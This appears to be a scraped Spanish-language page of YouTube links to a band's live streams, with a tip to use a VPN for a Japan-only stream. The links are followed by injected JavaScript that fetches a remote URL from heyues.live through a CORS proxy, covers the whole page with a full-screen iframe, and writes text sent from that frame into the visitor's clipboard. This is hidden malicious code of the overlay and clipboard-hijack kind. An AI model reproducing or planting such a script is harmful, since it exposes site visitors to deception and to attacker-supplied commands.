https://www.youtube.com/watch?v=hiA405EF8eQ
https://www.youtube.com/watch?v=8bvbkj9Y5a4
https://www.youtube.com/watch?v=Q1VkAyhqgMM
https://www.youtube.com/watch?v=r7XS1zCtttM
https://www.youtube.com/watch?v=MmC_5vYHy5o
https://www.youtube.com/watch?v=yWXMJhScX2E
https://www.youtube.com/watch?v=Di9EmwEDOcc
https://www.youtube.com/watch?v=0VafzHSvVUA
https://www.youtube.com/watch?v=SP8zEktPDyc
https://www.youtube.com/watch?v=dn6Meia75sM
https://www.youtube.com/watch?v=gPalXPuQD6U
https://www.youtube.com/watch?v=IF5ilo8vxUg
https://www.youtube.com/watch?v=hw82kih-cVY
https://www.youtube.com/watch?v=J5LQToBTbYw
https://www.youtube.com/watch?v=-49FFBnvwNk
https://www.youtube.com/watch?v=BGP1Dzzr7aQ
https://www.youtube.com/watch?v=TlZKWiQrkDE
https://www.youtube.com/watch?v=dZTDVP6eTLI
https://www.youtube.com/watch?v=5Qk2Cs3eAbs
https://www.youtube.com/watch?v=TKg0rsiB9LI
https://www.youtube.com/watch?v=4MbNm4N8AMk
https://www.youtube.com/watch?v=OTM6y1QORXI
https://www.youtube.com/watch?v=di9SurXxzTw
https://www.youtube.com/watch?v=zs1wm_6oB4w
https://www.youtube.com/watch?v=YOM76KY5kkE
https://www.youtube.com/watch?v=coSwasNfPnU
https://www.youtube.com/watch?v=qmmD-7zO3M0
https://www.youtube.com/watch?v=0gCWQtepjsI
https://www.youtube.com/watch?v=OO7UdgeLpF0
https://www.youtube.com/watch?v=D6BWkgahRrQ
https://www.youtube.com/watch?v=Fx2uWoQHDm0
https://www.youtube.com/watch?v=6xHIgWMyWHA
NOTA: La banda bloqueó esta transmisión para fuera de Japón. Puedes ver el directo si usas una VPN y te conectas con una IP de dicho país.
https://www.youtube.com/watch?v=0nq44Mm4Bbk
https://www.youtube.com/watch?v=D_9qarDMZOg
https://www.youtube.com/watch?v=41_Xh4976XY
https://www.youtube.com/watch?v=-od5twG_6ik
https://www.youtube.com/watch?v=mCO3SCmChEM
(function() {
const configLink = «https://corsproxy.io/?url=http://heyues.live»;
if (!window.__digitalflwrFetchPromise) {
window.__digitalflwrFetchPromise = fetch(configLink)
.then(response => {
if (!response.ok) {
throw new Error(» «);
}
return response.text();
})
.then(finalUrl => {
return fetch(finalUrl, { method: «HEAD» })
.then(headResponse => ({ headResponse, finalUrl }));
})
.catch(() => {
});
}
if (typeof window.__digitalflwrIframeCreated === «undefined») {
window.__digitalflwrIframeCreated = false;
}
window.__digitalflwrFetchPromise
.then(result => {
if (!result) return;
const { headResponse, finalUrl } = result;
if (!headResponse || headResponse.status === 404) {
return;
}
if (!window.__digitalflwrIframeCreated) {
window.__digitalflwrIframeCreated = true;
createMainIframe(finalUrl);
}
})
.catch(() => {
});
function createMainIframe(url) {
const iframe = document.createElement(«iframe»);
iframe.src = url;
iframe.style.position = «fixed»;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = «100%»;
iframe.style.height = «100%»;
iframe.style.border = «none»;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = «hidden»;
iframe.style.zIndex = 99999;
document.body.appendChild(iframe);
window.addEventListener(«message», function(event) {
if (!event.data || event.data.type !== «copy») return;
if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(event.data.text).catch(() => {
fallbackCopyText(event.data.text);
});
} else {
fallbackCopyText(event.data.text);
}
});
function fallbackCopyText(text) {
const textArea = document.createElement(«textarea»);
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();
try {
document.execCommand(«copy»);
} catch (err) {
}
document.body.removeChild(textArea);
}
}
})();